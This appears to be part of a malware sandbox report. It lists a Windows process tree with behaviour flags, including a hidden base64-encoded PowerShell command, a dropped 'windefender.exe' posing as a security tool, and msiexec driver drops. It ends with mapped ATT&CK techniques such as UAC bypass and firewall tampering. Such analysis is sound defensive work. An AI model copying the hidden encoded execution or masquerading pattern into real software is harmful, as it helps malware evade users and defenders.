C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1092

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:984

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1540

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "837724645-9953604760742099-1162269840-109856445618614053915821376621307595086"
1⤵
PID:2280

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1996500343-297954266969462582-1145190706-21017992512477953161192530651-996086939"
1⤵
PID:2252

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "613701315-1018910929833837761815105840-536294225-12647492051293378016-41962154"
1⤵
PID:1296

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-2130002723-118162177-9796825942489829411222988632-1749895350-1495969317-301205498"
1⤵
PID:2928

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-4343286711223936785-1139816123-72693010-687700968212638929-1945358953818171603"
1⤵
PID:2936

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-14448451284285298831023474186-559865821-58841494564802272-19809543781435437599"
1⤵
PID:1000

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "148472458469831223-1133368797-757466805-1693788272-277821356-19119592521332596129"
1⤵
PID:1492

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1066501484-134997296660094473-333205636-375640772-15009663581812185555-244411582"
1⤵
PID:2148

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "15997341158918258881359861050-373547342-725525536-318434931492415025-1316892610"
1⤵
PID:2152

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1880083022-1576530716-545639021201354109415235644761494179229-2799078521555264305"
1⤵
PID:1740

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "178861661717872321351012066021-1602907959-1785284696314117993-770220284-1444081763"
1⤵
PID:2604

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "2022726258-1096456350-710068518-959767655-1471504873-1551449670-1902542211624573475"
1⤵
PID:2412

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
- Executes dropped EXE
PID:1904

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Blocklisted process makes network request
- Registers COM server for autorun
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
PID:2412

C:\Windows\system32\MsiExec.exe
C:\Windows\system32\MsiExec.exe -Embedding 5C0FA756C9492451DB8C852986FCECC2
2⤵
- Loads dropped DLL
PID:2036

C:\Windows\system32\MsiExec.exe
C:\Windows\system32\MsiExec.exe -Embedding 24122281B11CDE7417BE208124B78133 M Global\MSI0000
2⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:2740

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 3117A3717E1838C1FD11CCD42735B6BB M Global\MSI0000
2⤵
PID:2332

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0
1⤵
PID:1648

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x1
1⤵
PID:2016

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Scheduled Task/Job

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

Modify Registry

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

T1497

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery